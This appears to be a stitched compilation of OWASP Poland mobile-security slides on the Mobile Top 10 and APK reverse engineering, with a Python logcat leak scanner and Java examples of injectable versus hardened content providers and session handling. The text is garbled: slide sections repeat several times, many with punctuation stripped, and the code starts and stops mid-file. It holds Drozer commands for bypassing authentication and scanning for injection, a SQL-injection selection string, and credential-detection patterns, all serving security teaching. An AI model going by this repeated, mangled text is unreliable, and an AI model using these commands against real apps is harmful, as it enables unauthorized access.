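# Card numbers are handled separately: a digit run only counts if Luhn passes.
LEAK_PATTERNS = {
    "credential": re.compile(
        r"\b(?:password|passwd|pwd|secret|api[_-]?key)\s*[=:]\s*\S+", re.I),
    "bearer-token": re.compile(r"\b(?:Bearer|Basic)\s+[A-Za-z0-9._~+/=-]+"),
    "email": re.compile(r"\b[\w.+-]+@[\w-]+\.[\w.-]+\b"),
    "location": re.compile(
        r"\b(?:lat(?:itude)?|lon(?:gitude)?)\s*[=:]\s*-?\d+\.\d+", re.I),
}
CARD_CANDIDATE = re.compile(r"\b\d{13,19}\b")

SAMPLE_LOGCAT = """\
D/LoginActivity( 4321): POST /login user=alice password=Summer2016!
I/ActivityManager(  812): Displayed com.example.vulnapp/.MainActivity: +312ms
D/ApiClient( 4321): Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJhbGljZSJ9.sig
D/Analytics( 4321): report lat=51.1079 lon=17.0385 uid=42
D/Checkout( 4321): card=4111111111111111 exp=12/19
D/Checkout( 4321): order id=4111111111111112 shipped
"""


def luhn_ok(digits: str) -> bool:
    """Luhn checksum, so a long order id is not reported as a card number."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


@dataclass
class Leak:
    line: int
    tag: str
    kind: str
    sample: str   # the matched text, so the reviewer can locate it; cards are masked


def find_leaks(logcat: str, pid: Optional[int] = None) -> list[Leak]:
    """Scan every parseable line (optionally only one pid) and return the leaks."""
    leaks: list[Leak] = []
    for lineno, raw in enumerate(logcat.splitlines(), start=1):
        m = LOGCAT_LINE.match(raw)
        if not m or (pid is not None and int(m["pid"]) != pid):
            continue
        msg, tag = m["msg"], m["tag"]
        for kind, pattern in LEAK_PATTERNS.items():
            hit = pattern.search(msg)
            if hit:
                leaks.append(Leak(lineno, tag, kind, hit.group(0)))
        for cand in CARD_CANDIDATE.findall(msg):
            if luhn_ok(cand):
                leaks.append(Leak(lineno, tag, "card-number",
                                  cand[:6] + "*" * (len(cand) - 6)))
    return leaks


if __name__ == "__main__":
    for leak in find_leaks(SAMPLE_LOGCAT, pid=4321):
        print(f"line {leak.line:>2} [{leak.tag}] {leak.kind}: {leak.sample}")
```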
Unintended data leakage - demo
Unintended data leakage - mitigations
• NEVER log any sensitive information (observe what you're storing in crash logs)
• Disable the copy/paste function for sensitive parts of the application
• Disable debugging (android:debuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication – what it is
• Simple words definition: if you're able to bypass authentication and/or leverage your privileges then… your app has poor authorization and/or authentication
Poor Authorization and Authentication – how to find
• Try to bypass authentication by accessing exported activities using Drozer:
  dz> run app.activity.start --component <component_name>
• Intercept traffic with Burp and modify parameters to log in as another user/see unauthorized content (e.g. by manipulating the device ID)
• Test the account lockout policy
• Test the strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication – real example
• A flaw in an application can become an entry point to compromise the operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage – what it is
• Simple words definition: the OS/framework puts sensitive information in an insecure location on the device
• Important note: insecure data storage talks about the developer's conscious efforts to store data in an insecure manner, while unintended data leakage refers to OS/framework-specific quirks which can cause data leakages
Unintended data leakage – common leakage points
• URL caching
• Copy/paste buffer caching
• Logging
• Analytics data sent to 3rd parties (e.g. ads sending GPS location)
Unintended data leakage – how to find
• Extract data from leaking content providers using Drozer:
dz> run app.provider.finduri <package_name>
• Use logcat to verify what is being logged, using ADB: adb logcat [output filter]
• Use a listener (Burp/Wireshark) to monitor what is being sent to 3rd parties
• Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
• NEVER log any sensitive information (observe what you're storing in crash logs)
• Disable the copy/paste function for sensitive parts of the application
• Disable debugging (android:debuggable="false")
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication – what is it
• Simple words definition: if you're able to bypass authentication and/or leverage your privileges then… your app has poor authorization and/or authentication
Poor Authorization and Authentication – how to find
• Try to bypass authentication by accessing exported activities using Drozer:
dz> run app.activity.start --component <component_name>
• Intercept traffic with Burp and modify parameters to log in as another user / see unauthorized content (e.g. by manipulating the device ID)
• Test the account lockout policy
• Test the strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication – real example
• A flaw in an application can become an entry point to compromise an operating system
• For example, the Viber app: https://www.youtube.com/watch?time_continue=40&v=rScheIQDD0k
And always remember to…
• …stay reasonable when you're going to follow advice from the Internet…
Poor Authorization and Authentication - mitigations
• Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server side whenever possible
• Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a user's password on the device. It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography – what it is
• Simple words definition: using an insecure implementation, or implementing it in an insecure way
• A few reminders (yeah, I know you know it…)
– encoding ≠ encryption
– obfuscation ≠ encryption
Broken Cryptography – how to find
• Decompile the apk using dex2jar (or Luyten for a more verbose result) and review the jar file in JD-GUI
• Look for decryption keys (in an attacker-readable folder or hardcoded within the binary)
• Try to break the encryption algorithm if an application uses custom encryption
• Look for usage of insecure and/or deprecated algorithms (e.g. RC4, MD4/5, SHA1 etc.)
Broken Cryptography - example
• An encrypted db is definitely a good idea…
Broken Cryptography - example
• …but not when you're hardcoding the password to decrypt it in code…
Broken Cryptography – real example
• NQ Vault
Broken Cryptography - mitigations
• Use known strong cryptography implementations
• Do not hardcode keys/credentials/OAuth tokens
• Do not store keys on a device. Use password based encryption instead
M7 - Client side injection
Client side injection – what it is
• Simple words definition: malicious code can be provided as an input and executed by the application (on the client side)
• The malicious code can come from:
– Another application via intent/content provider
– Shared file
– Server response
– Third party website
Client side injection – what to inject
• SQL injection into the local db
• XSS/WebView injection
• Directory traversal
• Intent injection
Android's new toy – the Intents
• An Android application can talk (Inter-Process Communication) to any other component (e.g. another application, a system service, running a new activity etc.) via special objects called Intents:
Intent i = new Intent(Intent.ACTION_VIEW, Uri.parse("https://owasp.org"));
Intent i = new Intent(android.provider.MediaStore.ACTION_IMAGE_CAPTURE);
Client side injection – how to find
• SQL injections:
dz> run scanner.provider.injection -a <package_name>
• Data path traversal:
dz> run scanner.provider.traversal -a <package_name>
• Intent injections:
dz> run app.package.manifest -a <package_name>
dz> run app.activity.info -a <package_name>
dz> run app.service.info --permission null -a <package_name>
dz> run intents.fuzzinozer --package_name <package_name> --fuzzing_intent
Client side injection – real example
• The UniversalMDMClient (a built-in application of Samsung KNOX – a security feature to separate personal and professional activities)
• A crafted URI with the „smdm” prefix allows remote installation of ANY application while the user thinks he's installing an update for UniversalMDMClient
• How it works in practice: https://www.youtube.com/watch?time_continue=56&v=6O9OBmsv-CM
Client side injection - mitigations
• Always validate any user input on the server side
• For internal communication use only explicit Intents
• Avoid using Intent filters. Even if the Activity has the attribute android:exported="false", another application can define the same filter and the system displays a dialog so the user can pick which app to use
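An added example (not code from the slides or from any real app) that puts two of the findings above side by side with their fix: a content provider whose query() pastes the caller's selection into SQL, which is what scanner.provider.injection detects, next to the parameterized version; and an explicit Intent for in-app navigation that no foreign intent filter can claim. The "notes" table, its columns and SettingsActivity are hypothetical.

```java
import android.app.Activity;
import android.content.ContentProvider;
import android.content.ContentValues;
import android.content.Context;
import android.content.Intent;
import android.database.Cursor;
import android.database.sqlite.SQLiteDatabase;
import android.database.sqlite.SQLiteQueryBuilder;
import android.net.Uri;
import java.util.HashMap;
import java.util.Map;

// Declared in the manifest as
//   <provider android:name=".NotesProvider" android:authorities="com.example.notes"
//             android:exported="false" />
// Keeping it unexported already stops other apps; the query hardening below still
// matters, because a provider that must be shared gets the same caller-controlled input.
public class NotesProvider extends ContentProvider {
    private static final Map<String, String> PROJECTION = new HashMap<>();
    static {
        // Whitelist of columns a caller may name; with setStrict() anything else is rejected.
        PROJECTION.put("_id", "_id");
        PROJECTION.put("title", "title");
        PROJECTION.put("body", "body");
    }
    private SQLiteDatabase db; // opened from an SQLiteOpenHelper in onCreate() in a real app

    @Override public boolean onCreate() { return true; }

    // Injectable: selection arrives from the caller and becomes SQL text verbatim, so a
    // selection such as  1=1 --  or a UNION of another table is executed as written.
    Cursor queryVulnerable(String selection) {
        return db.rawQuery("SELECT _id, title, body FROM notes WHERE " + selection, null);
    }

    // Hardened: the query builder limits columns to the projection map, setStrict()
    // refuses sub-selects and unknown identifiers in the WHERE clause, and every value
    // travels as a bound parameter in selectionArgs, never as part of the SQL string.
    @Override
    public Cursor query(Uri uri, String[] projection, String selection,
                        String[] selectionArgs, String sortOrder) {
        SQLiteQueryBuilder qb = new SQLiteQueryBuilder();
        qb.setTables("notes");
        qb.setProjectionMap(PROJECTION);
        qb.setStrict(true);
        return qb.query(db, projection, selection, selectionArgs, null, null, sortOrder);
    }

    // Caller side of the same rule: the value goes into selectionArgs, the SQL stays constant.
    static Cursor findByTitle(ContentProvider provider, Uri uri, String userTitle) {
        return provider.query(uri, new String[] { "_id", "title" },
                              "title = ?", new String[] { userTitle }, null);
    }

    @Override public Uri insert(Uri uri, ContentValues values) { return null; }
    @Override public int delete(Uri uri, String selection, String[] selectionArgs) { return 0; }
    @Override public int update(Uri uri, ContentValues values, String selection,
                                String[] selectionArgs) { return 0; }
    @Override public String getType(Uri uri) { return null; }

    // Explicit Intent for internal navigation: the target component is named, so the
    // system never shows a chooser and no other app's <intent-filter> can receive the
    // extras. Implicit form to avoid for internal screens: new Intent("com.example.OPEN_SETTINGS").
    static Intent openSettings(Context ctx, String userId) {
        Intent i = new Intent(ctx, SettingsActivity.class);
        i.putExtra("user_id", userId);
        return i;
    }

    // Stand-in for the app's own screen; a real app declares it in the manifest.
    public static class SettingsActivity extends Activity { }
}
```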
M9 - Improper session handling
Improper session handling – what it is
• Simple words definition: if your session token can be guessed, retrieved by a third party or never expires, then you have a problem
Improper session handling – how to find
• Intercept requests with a proxy (e.g. Burp) and:
– Verify if a session expires (copy a cookie and try to use it after 30 minutes)
– Verify if a session is destroyed after the authentication state changes (e.g. switching from any logged in user to another logged in user)
– Verify if you are able to guess any other session (e.g. it's easy to impersonate another user when the application uses the device ID as a session token)
Improper session handling – few facts from reality
• What we know is that „sessions have to expire”…
• …but how long should they REALLY last?
• According to an experiment, the average application session (counted from opening an app to closing it) lasts… 71.56 seconds
- http://www.mendeley.com/research/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
• Invalidate the session on the server side
• Set the session expiration time adjusted to your application
• Destroy all unused session tokens
• Use only high entropy, tested token generation resources
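Server-side counterpart of these mitigations (and of the M5 rule that authorization is enforced on the server), as an added example that is not part of the slides: an in-memory session store with CSPRNG tokens, an idle timeout, and destruction of every token of a user when the authentication state changes. The 15-minute timeout, user names and timestamps are constructed assumptions; a production service would back this with a shared store.

```java
import java.security.SecureRandom;
import java.time.Duration;
import java.time.Instant;
import java.util.Base64;
import java.util.Iterator;
import java.util.Map;
import java.util.concurrent.ConcurrentHashMap;

public final class SessionStore {
    private static final SecureRandom RNG = new SecureRandom();
    private final Duration idleTimeout;
    private final Map<String, Session> sessions = new ConcurrentHashMap<>();

    static final class Session {
        final String userId;
        volatile Instant lastSeen;
        Session(String userId, Instant now) { this.userId = userId; this.lastSeen = now; }
    }

    public SessionStore(Duration idleTimeout) { this.idleTimeout = idleTimeout; }

    // 256 bits from the platform CSPRNG. The guessable alternatives the slides warn about
    // (device ID, IMEI, counters, timestamps) share none of this entropy.
    static String newToken() {
        byte[] b = new byte[32];
        RNG.nextBytes(b);
        return Base64.getUrlEncoder().withoutPadding().encodeToString(b);
    }

    public String login(String userId, Instant now) {
        String token = newToken();
        sessions.put(token, new Session(userId, now));
        return token;
    }

    // The only place authorization is decided: a token is valid if the server still
    // holds it and it has been used within idleTimeout. Expired tokens are destroyed
    // on sight, so a cookie replayed after the timeout (the 30-minute test above) fails.
    public String resolve(String token, Instant now) {
        Session s = sessions.get(token);
        if (s == null) return null;
        if (Duration.between(s.lastSeen, now).compareTo(idleTimeout) > 0) {
            sessions.remove(token);
            return null;
        }
        s.lastSeen = now;
        return s.userId;
    }

    public void invalidate(String token) { sessions.remove(token); }

    // Authentication state change (logout everywhere, password change, privilege change):
    // every token the user holds is destroyed, not only the one the request carried.
    public void invalidateUser(String userId) {
        Iterator<Map.Entry<String, Session>> it = sessions.entrySet().iterator();
        while (it.hasNext()) {
            if (it.next().getValue().userId.equals(userId)) it.remove();
        }
    }

    // Switching accounts never reuses the old token: the previous user's sessions are
    // destroyed and the new user receives a freshly generated one.
    public String switchUser(String oldToken, String newUserId, Instant now) {
        Session old = sessions.remove(oldToken);
        if (old != null) invalidateUser(old.userId);
        return login(newUserId, now);
    }

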